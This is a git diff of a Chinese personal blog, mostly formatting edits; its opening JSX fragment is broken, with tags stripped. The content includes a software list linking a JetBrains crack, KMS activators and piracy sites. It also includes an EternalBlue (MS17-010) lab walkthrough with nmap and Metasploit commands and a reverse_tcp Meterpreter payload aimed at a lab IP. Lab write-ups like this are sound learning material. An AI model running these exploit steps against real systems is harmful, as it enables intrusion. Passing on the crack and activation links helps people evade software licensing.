-
+ {filteredArticles.map(article => {
+ return (
+
-
+
+
+
+ {article.summary && (
+
+ )}
+
+ {article.tags && article.tags.length > 0 && (
+ + {article.tags.slice(0, 3).map(tag => ( + + {tag} + + ))} + {article.tags.length > 3 && ( + + +{article.tags.length - 3} + + )} ++ )} + +
+ );
+ })}
+
{title}
- -加载更多...
-已加载全部内容
-访问错误
+{error}
+已加载全部内容
+{title}
+ ++ + {item.title} + +
+加载更多...(第{currentPage}页)
+
{hoveredCountry}
{hoveredCountry && visitedPlaces.includes(hoveredCountry) ? (
diff --git a/src/content/常用软件.md b/src/content/常用软件.md
index 8096298..d5e8edc 100644
--- a/src/content/常用软件.md
+++ b/src/content/常用软件.md
@@ -3,170 +3,185 @@ title: "常用软件"
date: 2023-04-28T20:56:00Z
tags: []
---
+
### Windows 应用
---
-* **开发软件:**
+- **开发软件:**
- * [JetBrains全家桶](https://www.jetbrains.com/zh-cn/products/)
- * [JetBrains破解软件](https://linux.do/t/topic/115562)
-* **压缩软件:** [NanaZIP](https://github.com/M2Team/NanaZip) (应用商店可下载)
-* **办公软件:**
+ - [JetBrains 全家桶](https://www.jetbrains.com/zh-cn/products/)
+ - [JetBrains 破解软件](https://linux.do/t/topic/115562)
- * [Office Tool Plus](https://otp.landian.vip/zh-cn/download.html) (office下载)
- * [WAS](https://github.com/massgravel/Microsoft-Activation-Scripts) (windows/office 激活)
- * [HEU_KMS_Activator](https://github.com/zbezj/HEU_KMS_Activator/releases) (windows/office 激活)
-* **下载器:** [IDM](https://www.internetdownloadmanager.com/)
-* **卸载工具:** [Geek](https://geekuninstaller.com/)
-* **文件搜索工具:** [Everything](https://www.voidtools.com/downloads/)
-* **电脑硬件检测:** [图吧工具箱](http://www.tbtool.cn/)
-* **浏览器:**
+- **压缩软件:** [NanaZIP](https://github.com/M2Team/NanaZip) (应用商店可下载)
+- **办公软件:**
- * [chrome](https://www.google.com/chrome/)
- * [Arc](https://arc.net/)
- * [百分浏览器](https://www.centbrowser.cn/)
-* **ssh工具:**
+ - [Office Tool Plus](https://otp.landian.vip/zh-cn/download.html) (office 下载)
+ - [WAS](https://github.com/massgravel/Microsoft-Activation-Scripts) (windows/office 激活)
+ - [HEU_KMS_Activator](https://github.com/zbezj/HEU_KMS_Activator/releases) (windows/office 激活)
- * [tabby](https://github.com/Eugeny/tabby/tree/master)
- * [FinalShell](http://www.hostbuf.com/)
-* **adb工具:** [Platform Tools](https://developer.android.com/tools/releases/platform-tools?hl=zh-cn)
-* **科学上网工具:**
+- **下载器:** [IDM](https://www.internetdownloadmanager.com/)
+- **卸载工具:** [Geek](https://geekuninstaller.com/)
+- **文件搜索工具:** [Everything](https://www.voidtools.com/downloads/)
+- **电脑硬件检测:** [图吧工具箱](http://www.tbtool.cn/)
+- **浏览器:**
- * [Clash for Windows](https://github.com/Z-Siqi/Clash-for-Windows_Chinese/releases)
- * [v2rayN](https://github.com/2dust/v2rayN/releases/)
- * [v2ray-rules-dat](https://github.com/Loyalsoldier/v2ray-rules-dat):V2Ray 路由规则文件加强版
-* **驱动管理:** [360驱动大师](http://dm.weishi.360.cn/home.html)
-* **运行库安装:** [NET Framework](https://dotnet.microsoft.com/zh-cn/download/dotnet-framework)
-* **任务栏透明工具:** [TranslucentTB](https://github.com/TranslucentTB/TranslucentTB#start-of-content) (应用商店可下载)
-* **壁纸软件:** [Wallpaper Engine](https://store.steampowered.com/app/431960/Wallpaper_Engine/)
-* **防火墙应用:**
+ - [chrome](https://www.google.com/chrome/)
+ - [Arc](https://arc.net/)
+ - [百分浏览器](https://www.centbrowser.cn/)
- * [360安全卫士极速版](https://weishi.360.cn/jisu/)
- * [火绒](https://www.huorong.cn/)
+- **ssh 工具:**
+
+ - [tabby](https://github.com/Eugeny/tabby/tree/master)
+ - [FinalShell](http://www.hostbuf.com/)
+
+- **adb 工具:** [Platform Tools](https://developer.android.com/tools/releases/platform-tools?hl=zh-cn)
+- **科学上网工具:**
+
+ - [Clash for Windows](https://github.com/Z-Siqi/Clash-for-Windows_Chinese/releases)
+ - [v2rayN](https://github.com/2dust/v2rayN/releases/)
+ - [v2ray-rules-dat](https://github.com/Loyalsoldier/v2ray-rules-dat):V2Ray 路由规则文件加强版
+
+- **驱动管理:** [360 驱动大师](http://dm.weishi.360.cn/home.html)
+- **运行库安装:** [NET Framework](https://dotnet.microsoft.com/zh-cn/download/dotnet-framework)
+- **任务栏透明工具:** [TranslucentTB](https://github.com/TranslucentTB/TranslucentTB#start-of-content) (应用商店可下载)
+- **壁纸软件:** [Wallpaper Engine](https://store.steampowered.com/app/431960/Wallpaper_Engine/)
+- **防火墙应用:**
+
+ - [360 安全卫士极速版](https://weishi.360.cn/jisu/)
+ - [火绒](https://www.huorong.cn/)
### Android 应用
---
-* **下载器:** 1DM+
-* **安装器:** R-安装组件
-* **浏览器:**
+- **下载器:** 1DM+
+- **安装器:** R-安装组件
+- **浏览器:**
- * [雨见浏览器国际版](https://yjllq.com/)
- * [Alook](https://www.alookweb.com/)
-* **文件管理器:** [MT管理器](https://mt2.cn/)
-* **网络工具:**
+ - [雨见浏览器国际版](https://yjllq.com/)
+ - [Alook](https://www.alookweb.com/)
- * Cellular Pro
- * VPN热点
-* **科学上网:**
+- **文件管理器:** [MT 管理器](https://mt2.cn/)
+- **网络工具:**
- * Surfboard
- * [v2rayNG](https://github.com/2dust/v2rayNG/releases)
-* **终端模拟器**:
+ - Cellular Pro
+ - VPN 热点
- * [Termux](https://termux.dev/)
- * [ZeroTermux](https://github.com/hanxinhao000/ZeroTermux)
-* **Git 存储库管理工具:** [GitNex](https://gitnex.com/)
-* **视频播放器:**
+- **科学上网:**
- * MX播放器专业版
- * XPlayer - 万能视频播放器
-* **服务器连接:**
+ - Surfboard
+ - [v2rayNG](https://github.com/2dust/v2rayNG/releases)
- * [JuiceSSH](https://juicessh.com/)
- * RD客户端 (连接Windows)
- * [Termius](https://termius.com/)
-* **根目录整理:** [存储空间隔离](https://sr.rikka.app/)
-* **定位修改:** [Fake Location](https://github.com/Lerist/FakeLocation)
-* **将操作系统映像写入USB驱动器:** [EtchDroid](https://github.com/EtchDroid/EtchDroid)
-* **adb工具:**
+- **终端模拟器**:
- * [搞机助手](https://gjzsr.com/)
- * 甲壳虫ADB助手
- * Bugjaeger Premium
- * [scene](https://github.com/kdrag0n/safetynet-fix/releases)
-* **Xposed软件**
+ - [Termux](https://termux.dev/)
+ - [ZeroTermux](https://github.com/hanxinhao000/ZeroTermux)
- * **抖音增强:** [FreedomPlus](https://github.com/Xposed-Modules-Repo/io.github.fplus)
- * **bilibili增强:** [哔哩漫游](https://github.com/yujincheng08/BiliRoaming)
- * **微信增强:** [微x模块](https://github.com/Xposed-Modules-Repo/com.fkzhang.wechatxposed)
- * **QQ增强:** [QAuxiliary](https://github.com/Xposed-Modules-Repo/io.github.qauxv)
- * **识别短信验证码:** [XposedSmsCode](https://github.com/Xposed-Modules-Repo/com.github.tianma8023.xposed.smscode)
-* **Magisk模块管理:**
+- **Git 存储库管理工具:** [GitNex](https://gitnex.com/)
+- **视频播放器:**
- * [LSPosed](https://github.com/LSPosed/LSPosed):已归档
- * 关闭SELinux
- * 停用HW叠加层模块
- * [Universal SafetyNet Fix](https://github.com/kdrag0n/safetynet-fix):绕过 Google 的 SafetyNet 认证
- * [Shamiko](https://github.com/LSPosed/LSPosed.github.io/releases):隐藏更多 Magisk 痕迹
+ - MX 播放器专业版
+ - XPlayer - 万能视频播放器
+
+- **服务器连接:**
+
+ - [JuiceSSH](https://juicessh.com/)
+ - RD 客户端 (连接 Windows)
+ - [Termius](https://termius.com/)
+
+- **根目录整理:** [存储空间隔离](https://sr.rikka.app/)
+- **定位修改:** [Fake Location](https://github.com/Lerist/FakeLocation)
+- **将操作系统映像写入 USB 驱动器:** [EtchDroid](https://github.com/EtchDroid/EtchDroid)
+- **adb 工具:**
+
+ - [搞机助手](https://gjzsr.com/)
+ - 甲壳虫 ADB 助手
+ - Bugjaeger Premium
+ - [scene](https://github.com/kdrag0n/safetynet-fix/releases)
+
+- **Xposed 软件**
+
+ - **抖音增强:** [FreedomPlus](https://github.com/Xposed-Modules-Repo/io.github.fplus)
+ - **bilibili 增强:** [哔哩漫游](https://github.com/yujincheng08/BiliRoaming)
+ - **微信增强:** [微 x 模块](https://github.com/Xposed-Modules-Repo/com.fkzhang.wechatxposed)
+ - **QQ 增强:** [QAuxiliary](https://github.com/Xposed-Modules-Repo/io.github.qauxv)
+ - **识别短信验证码:** [XposedSmsCode](https://github.com/Xposed-Modules-Repo/com.github.tianma8023.xposed.smscode)
+
+- **Magisk 模块管理:**
+
+ - [LSPosed](https://github.com/LSPosed/LSPosed):已归档
+ - 关闭 SELinux
+ - 停用 HW 叠加层模块
+ - [Universal SafetyNet Fix](https://github.com/kdrag0n/safetynet-fix):绕过 Google 的 SafetyNet 认证
+ - [Shamiko](https://github.com/LSPosed/LSPosed.github.io/releases):隐藏更多 Magisk 痕迹
### 浏览器插件
---
-* [AdGuard](https://adguard.com/zh_cn/adguard-browser-extension/overview.html):广告拦截程序
-* [篡改猴](https://www.tampermonkey.net/index.php?browser=chrome&locale=zh):脚本管理器
-* [猫抓](https://o2bmm.gitbook.io/cat-catch):资源嗅探
-* [图片助手(ImageAssistant)](https://www.pullywood.com/ImageAssistant/):嗅探、分析网页图片、图片筛选
-* [Circle 阅读助手](http://www.circlereader.com/):提取并排版网页内容
-* [Global Speed](https://chrome.google.com/webstore/detail/global-speed/jpbjcnkcffbooppibceonlgknpkniiff?hl=zh-CN):速度控制
-* [ColorZilla](https://www.colorzilla.com/zh-cn/):拾色器
-* [Selenium IDE](https://www.selenium.dev/zh-cn/documentation/ide/):记录和回放用户操作
-* [Floccus](https://floccus.org/download):同步书签和标签
-* [沉浸式翻译:](https://immersivetranslate.com/) 网页翻译
+- [AdGuard](https://adguard.com/zh_cn/adguard-browser-extension/overview.html):广告拦截程序
+- [篡改猴](https://www.tampermonkey.net/index.php?browser=chrome&locale=zh):脚本管理器
+- [猫抓](https://o2bmm.gitbook.io/cat-catch):资源嗅探
+- [图片助手(ImageAssistant)](https://www.pullywood.com/ImageAssistant/):嗅探、分析网页图片、图片筛选
+- [Circle 阅读助手](http://www.circlereader.com/):提取并排版网页内容
+- [Global Speed](https://chrome.google.com/webstore/detail/global-speed/jpbjcnkcffbooppibceonlgknpkniiff?hl=zh-CN):速度控制
+- [ColorZilla](https://www.colorzilla.com/zh-cn/):拾色器
+- [Selenium IDE](https://www.selenium.dev/zh-cn/documentation/ide/):记录和回放用户操作
+- [Floccus](https://floccus.org/download):同步书签和标签
+- [沉浸式翻译:](https://immersivetranslate.com/) 网页翻译
### Docker 应用
---
-* [vaultwarden](https://github.com/dani-garcia/vaultwarden):密码管理器,[Bitwarden](https://bitwarden.com/)的第三方 Docker 项目。
-* [AList](https://alist.nn.ci/zh/):支持多种文件储存,支持 WebDAV
-* [思源笔记](https://b3log.org/siyuan/):支持web端
-* [Gitea](https://about.gitea.com/):支持基于 Git 创建和管理存储库
-* [Nginx Proxy Manager](https://nginxproxymanager.com/):Nginx 代理管理器
-* [雷池](https://waf-ce.chaitin.cn/):基于Nginx开发的Web 应用防火墙
+- [vaultwarden](https://github.com/dani-garcia/vaultwarden):密码管理器,[Bitwarden](https://bitwarden.com/)的第三方 Docker 项目。
+- [AList](https://alist.nn.ci/zh/):支持多种文件储存,支持 WebDAV
+- [思源笔记](https://b3log.org/siyuan/):支持 web 端
+- [Gitea](https://about.gitea.com/):支持基于 Git 创建和管理存储库
+- [Nginx Proxy Manager](https://nginxproxymanager.com/):Nginx 代理管理器
+- [雷池](https://waf-ce.chaitin.cn/):基于 Nginx 开发的 Web 应用防火墙
### Linux 应用
---
-* [OpenSSH](https://www.openssh.com/):SSH连接工具
-* `Wget` `curl`:从网络上获取或发送数据
-* [vim](https://www.vim.org/):文本编辑器
-* [Git](https://git-scm.com/):分布式版本控制系统
-* [Zsh](https://www.zsh.org/):是一款功能强大、灵活可定制的shell
-* [哪吒面板](https://nezha.wiki/):服务器监控与运维工具
-* [screenfetch](https://github.com/KittyKatt/screenFetch):屏幕截图
-* [X-CMD](https://cn.x-cmd.com/):命令增强和扩展
-* 镜像仓库:
+- [OpenSSH](https://www.openssh.com/):SSH 连接工具
+- `Wget` `curl`:从网络上获取或发送数据
+- [vim](https://www.vim.org/):文本编辑器
+- [Git](https://git-scm.com/):分布式版本控制系统
+- [Zsh](https://www.zsh.org/):是一款功能强大、灵活可定制的 shell
+- [哪吒面板](https://nezha.wiki/):服务器监控与运维工具
+- [screenfetch](https://github.com/KittyKatt/screenFetch):屏幕截图
+- [X-CMD](https://cn.x-cmd.com/):命令增强和扩展
+- 镜像仓库:
- * [中科大开源软件镜像站](https://mirrors.ustc.edu.cn/)
- * [阿里巴巴开源镜像站](https://developer.aliyun.com/mirror/)
- * [网易开源镜像站](https://mirrors.163.com/)
- * [腾讯软件源](https://mirrors.cloud.tencent.com/)
- * [华为开源镜像站](https://mirrors.huaweicloud.com/home)
- * [移动云开源镜像站](https://mirrors.cmecloud.cn/)
- * [清华大学开源软件镜像站](https://mirrors.tuna.tsinghua.edu.cn/)
+ - [中科大开源软件镜像站](https://mirrors.ustc.edu.cn/)
+ - [阿里巴巴开源镜像站](https://developer.aliyun.com/mirror/)
+ - [网易开源镜像站](https://mirrors.163.com/)
+ - [腾讯软件源](https://mirrors.cloud.tencent.com/)
+ - [华为开源镜像站](https://mirrors.huaweicloud.com/home)
+ - [移动云开源镜像站](https://mirrors.cmecloud.cn/)
+ - [清华大学开源软件镜像站](https://mirrors.tuna.tsinghua.edu.cn/)
### 可被托管的应用
---
-* [CF-Workers-docker.io](https://github.com/cmliu/CF-Workers-docker.io):使用CF-workersDocker仓库镜像代理工具
-* [Cloudflare Proxy EX](https://github.com/1234567yang/cf-proxy-ex):使用CF-workers搭建代理
-* [Vercel 部署 Hugo 站点](https://vercel.com/guides/deploying-hugo-with-vercel)
+- [CF-Workers-docker.io](https://github.com/cmliu/CF-Workers-docker.io):使用 CF-workersDocker 仓库镜像代理工具
+- [Cloudflare Proxy EX](https://github.com/1234567yang/cf-proxy-ex):使用 CF-workers 搭建代理
+- [Vercel 部署 Hugo 站点](https://vercel.com/guides/deploying-hugo-with-vercel)
### 网站
---
-* 盗版软件:
+- 盗版软件:
- * [CyberMania](https://www.cybermania.ws/)
- * [果核剥壳](https://www.ghxi.com/)
-* 单价游戏:
+ - [CyberMania](https://www.cybermania.ws/)
+ - [果核剥壳](https://www.ghxi.com/)
- * [土豆资源库](http://tdtd.chat/index)
- * [3DMGAME](https://bbs.3dmgame.com/forum.php)
+- 单价游戏:
+
+ - [土豆资源库](http://tdtd.chat/index)
+ - [3DMGAME](https://bbs.3dmgame.com/forum.php)
diff --git a/src/content/技术日志/android/Android安装linux.md b/src/content/技术日志/android/Android安装linux.md
index 4081611..f485401 100644
--- a/src/content/技术日志/android/Android安装linux.md
+++ b/src/content/技术日志/android/Android安装linux.md
@@ -13,17 +13,17 @@ tags: []
1. 下载容器脚本并使用
- ```bash
- curl -LO https://gitee.com/mo2/linux/raw/2/2.awk
- awk -f 2.awk
- ```
+ ```bash
+ curl -LO https://gitee.com/mo2/linux/raw/2/2.awk
+ awk -f 2.awk
+ ```
2. 安装容器
- - 选择 `1. proot 容器`
- - 选择 `1. arm64 发行版列表`
- - 选择需要的镜像
- - 选择需要的版本
- - 如果显示没有权限读写文件,给软件 root 权限,重新开始
- - 请问是否新建 sudo 用户: 否
- - 遇到选择默认回车
- - tmoe-Tools: 不需要图形化界面直接选 `0` 退出
+ - 选择 `1. proot 容器`
+ - 选择 `1. arm64 发行版列表`
+ - 选择需要的镜像
+ - 选择需要的版本
+ - 如果显示没有权限读写文件,给软件 root 权限,重新开始
+ - 请问是否新建 sudo 用户: 否
+ - 遇到选择默认回车
+ - tmoe-Tools: 不需要图形化界面直接选 `0` 退出
diff --git a/src/content/技术日志/android/Android热点开机自启动和VPN热点.md b/src/content/技术日志/android/Android热点开机自启动和VPN热点.md
index f77f8f5..6922e27 100644
--- a/src/content/技术日志/android/Android热点开机自启动和VPN热点.md
+++ b/src/content/技术日志/android/Android热点开机自启动和VPN热点.md
@@ -13,14 +13,14 @@ tags: []
1. 打开 MacroDroid-Pro,给予 root 权限
2. 点击下面的 **宏** 再点击 **加号**
3. 配置:
- - **输入宏名称**:随便输入一个名字
- - **触发器**:点击触发器右上角的加号——设备事件——设备启动
- - **动作**:点击动作右上角的加号——连接——热点开/关——给予修改系统的权限(返回会弹出一个不适合此设备,忽略,点击确定)——选择启动热点,点击确认
+ - **输入宏名称**:随便输入一个名字
+ - **触发器**:点击触发器右上角的加号——设备事件——设备启动
+ - **动作**:点击动作右上角的加号——连接——热点开/关——给予修改系统的权限(返回会弹出一个不适合此设备,忽略,点击确定)——选择启动热点,点击确认
4. 点击右下角三条杠带一个加号,就可以实现热点开机启动了
## 二、VPN 热点
[VPN 热点](https://lsy22.lanzouj.com/iS9hw0hz5rfa?password=lsy22)
-1. 打开 *VPN 热点* 给予 root 权限
-2. 将 *WLAN 热点* 打开,打开后会多一个 *wlan1*,将 *wlan1* 打开就可以实现 VPN 热点了
+1. 打开 _VPN 热点_ 给予 root 权限
+2. 将 _WLAN 热点_ 打开,打开后会多一个 _wlan1_,将 _wlan1_ 打开就可以实现 VPN 热点了
diff --git a/src/content/技术日志/android/一加6t刷3系统思路.md b/src/content/技术日志/android/一加6t刷3系统思路.md
index bec20ff..c59fd8d 100644
--- a/src/content/技术日志/android/一加6t刷3系统思路.md
+++ b/src/content/技术日志/android/一加6t刷3系统思路.md
@@ -16,7 +16,7 @@ tags: []
### 切换安卓
1. 进入 fastboot 模式
-2. 用一个 root 的手机连接一加6T
+2. 用一个 root 的手机连接一加 6T
3. 在 root 手机上打开 [搞机助手](https://lsy22.lanzouq.com/il8M0z5c6oh?w1)
4. 选择全部 - otg 功能区 - fastboot 功能区切换 - 切换 a/b 分区 - 选择分区 A
5. 重启到 a 分区
diff --git a/src/content/技术日志/android/安装谷歌三件套服务框架.md b/src/content/技术日志/android/安装谷歌三件套服务框架.md
index 3ffaf87..51566a5 100644
--- a/src/content/技术日志/android/安装谷歌三件套服务框架.md
+++ b/src/content/技术日志/android/安装谷歌三件套服务框架.md
@@ -4,35 +4,35 @@ date: 2023-07-12T23:39:00+08:00
tags: []
---
-## Google服务框架
+## Google 服务框架
下载地址:[`https://www.apkmirror.com/apk/google-inc/google-services-framework/`](https://www.apkmirror.com/apk/google-inc/google-services-framework/)
-首先点击上边的网站,到Google服务框架程序的发布地址,然后找到和自己手机的安卓版本相匹配的版本。
-选择noDPI的版本
+首先点击上边的网站,到 Google 服务框架程序的发布地址,然后找到和自己手机的安卓版本相匹配的版本。
+选择 noDPI 的版本
-关于ARM版本:
-**一般近两年发布的手机,ARM版本都是ARMv8。如果是老手机,可以先搜一下自己的ARM版本。
-也可以直接下载universal版本,也就是兼容v8和v7的版本。**
+关于 ARM 版本:
+**一般近两年发布的手机,ARM 版本都是 ARMv8。如果是老手机,可以先搜一下自己的 ARM 版本。
+也可以直接下载 universal 版本,也就是兼容 v8 和 v7 的版本。**
## Google Play Service
下载地址:[`https://www.apkmirror.com/apk/google-inc/google-play-services/`](https://www.apkmirror.com/apk/google-inc/google-play-services/)
-首先点击上边的网站,到Google Play Service的发布地址,然后找到和自己手机的安卓版本相匹配的版本。
-那么就选择noDPI的版本
+首先点击上边的网站,到 Google Play Service 的发布地址,然后找到和自己手机的安卓版本相匹配的版本。
+那么就选择 noDPI 的版本
-关于ARM版本:
-**一般近两年发布的手机,ARM版本都是ARMv8。如果是老手机,可以先搜一下自己的ARM版本。
-也可以直接下载universal版本,也就是兼容v8和v7的版本。**
+关于 ARM 版本:
+**一般近两年发布的手机,ARM 版本都是 ARMv8。如果是老手机,可以先搜一下自己的 ARM 版本。
+也可以直接下载 universal 版本,也就是兼容 v8 和 v7 的版本。**
## Google Play Store
下载地址:[`https://www.apkmirror.com/apk/google-inc/google-play-store/`](https://www.apkmirror.com/apk/google-inc/google-play-store/)
-首先点击上边的网站,到Google Play Store的发布地址,然后找到和自己手机的安卓版本相匹配的版本。
-选择noDPI的版本
+首先点击上边的网站,到 Google Play Store 的发布地址,然后找到和自己手机的安卓版本相匹配的版本。
+选择 noDPI 的版本
-关于ARM版本:
-**一般近两年发布的手机,ARM版本都是ARMv8。如果是老手机,可以先搜一下自己的ARM版本。
-也可以直接下载universal版本,也就是兼容v8和v7的版本。**
+关于 ARM 版本:
+**一般近两年发布的手机,ARM 版本都是 ARMv8。如果是老手机,可以先搜一下自己的 ARM 版本。
+也可以直接下载 universal 版本,也就是兼容 v8 和 v7 的版本。**
diff --git a/src/content/技术日志/code/ms17-010(永恒之蓝)漏洞复现.md b/src/content/技术日志/code/ms17-010(永恒之蓝)漏洞复现.md
index 014e87b..951f39c 100644
--- a/src/content/技术日志/code/ms17-010(永恒之蓝)漏洞复现.md
+++ b/src/content/技术日志/code/ms17-010(永恒之蓝)漏洞复现.md
@@ -8,7 +8,7 @@ tags: []
#### 1. 漏洞描述
-Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
+Eternalblue 通过 TCP 端口 445 和 139 来利用 SMBv1 和 NBT 中的远程代码执行漏洞,恶意代码会扫描开放 445 文件共享端口的 Windows 机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
#### 2.漏洞影响
@@ -16,152 +16,157 @@ Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行
### 二. 复现环境
-* 虚拟环境搭建:`VMware Workstation 17 pro`
+- 虚拟环境搭建:`VMware Workstation 17 pro`
-* 网络模式:`NAT`
+- 网络模式:`NAT`
-* 攻击机:`kali Linux WSL`
-* 攻击机IP:`192.168.97.173`
-* 攻击工具:`nmap` `metasploit(MSF)`
+- 攻击机:`kali Linux WSL`
+- 攻击机 IP:`192.168.97.173`
+- 攻击工具:`nmap` `metasploit(MSF)`
-* 靶机:`cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408`(**前提win7关闭防火墙**)
-* 靶机IP:`192.168.97.128`
+- 靶机:`cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408`(**前提 win7 关闭防火墙**)
+- 靶机 IP:`192.168.97.128`
### 三. 启动 MSF
-1. 安装MSF
+1. 安装 MSF
- ```bash
- curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall && \./msfinstall
- ```
+ ```bash
+ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall && \./msfinstall
+ ```
2. 进入框架
- ```bash
- msfconsole
- ```
+ ```bash
+ msfconsole
+ ```
3. 初始化
- ```bash
- init
- ```
+ ```bash
+ init
+ ```
### 四. 寻找主机
-* **ipconfig**
+- **ipconfig**
- 使用`ipconfig`分别查看win7和kali中的ip地址
-* **nmap**
+ 使用`ipconfig`分别查看 win7 和 kali 中的 ip 地址
+
+- **nmap**
```bash
nmap -T5 -sP 192.168.97.0/24
```
- * **`-T5`**:使用速度模板**`T5`**,表示激进的扫描速度。
- * **`-sP`**:执行 Ping 连接扫描。
- * **`192.168.97.0/24`**:扫描指定的 IP 地址范围。
+ - **`-T5`**:使用速度模板**`T5`**,表示激进的扫描速度。
+ - **`-sP`**:执行 Ping 连接扫描。
+ - **`192.168.97.0/24`**:扫描指定的 IP 地址范围。
- | IP地址 | 私有ip范围 | 子网掩码 | CIDR |
- | --------- | :----------------------------- | :-------------- | :--------------- |
- | A类地址 | 10.0.0.0~10.255.255.255 | 255.0.0.0 | 10.0.0.0/8 |
- | B类地址 | 172.16.0.0~173.31.255.255 | 255.255.0.0 | 172.16.0.0/16 |
- | C类地址 | 192.168.0.0~192.168.255.255 | 255.255.255.0 | 192.168.0.0/24 |
+ | IP 地址 | 私有 ip 范围 | 子网掩码 | CIDR |
+ | -------- | :----------------------------- | :------------ | :------------- |
+ | A 类地址 | 10.0.0.0 ~ 10.255.255.255 | 255.0.0.0 | 10.0.0.0/8 |
+ | B 类地址 | 172.16.0.0 ~ 173.31.255.255 | 255.255.0.0 | 172.16.0.0/16 |
+ | C 类地址 | 192.168.0.0 ~ 192.168.255.255 | 255.255.255.0 | 192.168.0.0/24 |
### 五. 端口扫描
-* **nmap**
+- **nmap**
```bash
nmap -T5 -sT 192.168.97.128
```
- * **`-T5`**:使用速度模板**`T5`**,表示激进的扫描速度。
- * **`-sT`**:执行 TCP 连接扫描。
- * **`192.168.97.128`**:扫描指定的 IP
-* **MSF** 端口扫描
+ - **`-T5`**:使用速度模板**`T5`**,表示激进的扫描速度。
+ - **`-sT`**:执行 TCP 连接扫描。
+ - **`192.168.97.128`**:扫描指定的 IP
+
+- **MSF** 端口扫描
1. 使用模块
- ```bash
- use auxiliary/scanner/portscan/tcp
- ```
+ ```bash
+ use auxiliary/scanner/portscan/tcp
+ ```
- 2. 设置扫描ip
+ 2. 设置扫描 ip
- ```bash
- set rhosts 192.168.97.128
- ```
+ ```bash
+ set rhosts 192.168.97.128
+ ```
3. 运行
- ```bash
- run
- ```
+ ```bash
+ run
+ ```
### 六. 查找永恒之蓝漏洞
微软 永恒之蓝 编号`ms17-010`
```bash
-search ms17_010
+search ms17_010
```
1. `exploit/windows/smb/ms17_010_eternalblue`
- * 这个模块利用了MS17-010漏洞,通过EternalBlue攻击载荷,远程执行代码。
- * EternalBlue利用Windows的Server Message Block(SMB)协议中的漏洞,允许攻击者在目标机器上执行任意代码。
- * 攻击成功后,通常会在目标机器上生成一个Meterpreter会话,从而允许进一步的渗透测试操作。
+ - 这个模块利用了 MS17-010 漏洞,通过 EternalBlue 攻击载荷,远程执行代码。
+ - EternalBlue 利用 Windows 的 Server Message Block(SMB)协议中的漏洞,允许攻击者在目标机器上执行任意代码。
+ - 攻击成功后,通常会在目标机器上生成一个 Meterpreter 会话,从而允许进一步的渗透测试操作。
+
2. `exploit/windows/smb/ms17_010_psexec`
- * 这个模块结合MS17-010漏洞和Psexec技术,通过SMB协议在目标系统上执行命令。
- * 利用MS17-010漏洞进行初始攻击,然后使用Psexec进行进一步的远程命令执行。
- * 适用于在利用MS17-010漏洞后希望使用Psexec执行进一步的命令和控制操作时。
+ - 这个模块结合 MS17-010 漏洞和 Psexec 技术,通过 SMB 协议在目标系统上执行命令。
+ - 利用 MS17-010 漏洞进行初始攻击,然后使用 Psexec 进行进一步的远程命令执行。
+ - 适用于在利用 MS17-010 漏洞后希望使用 Psexec 执行进一步的命令和控制操作时。
+
3. `auxiliary/admin/smb/ms17_010_command`
- * 这个辅助模块用于通过MS17-010漏洞在目标系统上执行指定的命令。
- * 不会生成一个持久的会话,而是直接执行特定的命令并返回结果。
- * 适用于希望通过MS17-010漏洞在目标系统上执行单个命令的场景。
+ - 这个辅助模块用于通过 MS17-010 漏洞在目标系统上执行指定的命令。
+ - 不会生成一个持久的会话,而是直接执行特定的命令并返回结果。
+ - 适用于希望通过 MS17-010 漏洞在目标系统上执行单个命令的场景。
+
4. `auxiliary/scanner/smb/smb_ms17_010`
- * 这个辅助模块用于扫描目标系统是否存在MS17-010漏洞。
- * 不会进行实际的漏洞利用或攻击,而是仅检测目标系统是否易受MS17-010漏洞的影响。
+ - 这个辅助模块用于扫描目标系统是否存在 MS17-010 漏洞。
+ - 不会进行实际的漏洞利用或攻击,而是仅检测目标系统是否易受 MS17-010 漏洞的影响。
### 七. 漏洞检测
-* 使用探测模块
+- 使用探测模块
1. 使用`Auxiliary`辅助探测模块
- ```bash
- use auxiliary/scanner/smb/smb_ms17_010
- ```
+ ```bash
+ use auxiliary/scanner/smb/smb_ms17_010
+ ```
- 或
+ 或
- ```bash
- use 24
- ```
+ ```bash
+ use 24
+ ```
2. 查看需要配置的参数
- ```bash
- show options
- ```
+ ```bash
+ show options
+ ```
3. 设置目标主机地址
- ```bash
- set rhosts 192.168.97.128
- ```
+ ```bash
+ set rhosts 192.168.97.128
+ ```
4. 运行
- ```bash
- run
- ```
+ ```bash
+ run
+ ```
-* nmap
+- nmap
```bash
nmap --script smb-vuln-ms17-010 192.168.97.128
@@ -171,29 +176,29 @@ search ms17_010
1. 加载 ms17-010 攻击模块
- ```bash
- use exploit/windows/smb/ms17_010_eternalblue
- ```
+ ```bash
+ use exploit/windows/smb/ms17_010_eternalblue
+ ```
2. 设置目标主机地址
- ```bash
- set rhosts 192.168.97.128
- ```
+ ```bash
+ set rhosts 192.168.97.128
+ ```
3. 设置连接方式为反向连接
- ```bash
- set payload windows/x64/meterpreter/reverse_tcp
- ```
+ ```bash
+ set payload windows/x64/meterpreter/reverse_tcp
+ ```
4. 运行
- ```bash
- run
- ```
+ ```bash
+ run
+ ```
-### Meterpreter的命令用法
+### Meterpreter 的命令用法
```bash
==========================================
@@ -370,33 +375,33 @@ timestomp 操作文件 MACE 属性
#### 基础使用
-* 进入框架
+- 进入框架
```bash
msfconsole
```
-* 查找漏洞
+- 查找漏洞
```bash
search 漏洞编号
```
-
-* 使用模块
+
+- 使用模块
```bash
run
```
-#### Meterpreter工作原理
+#### Meterpreter 工作原理
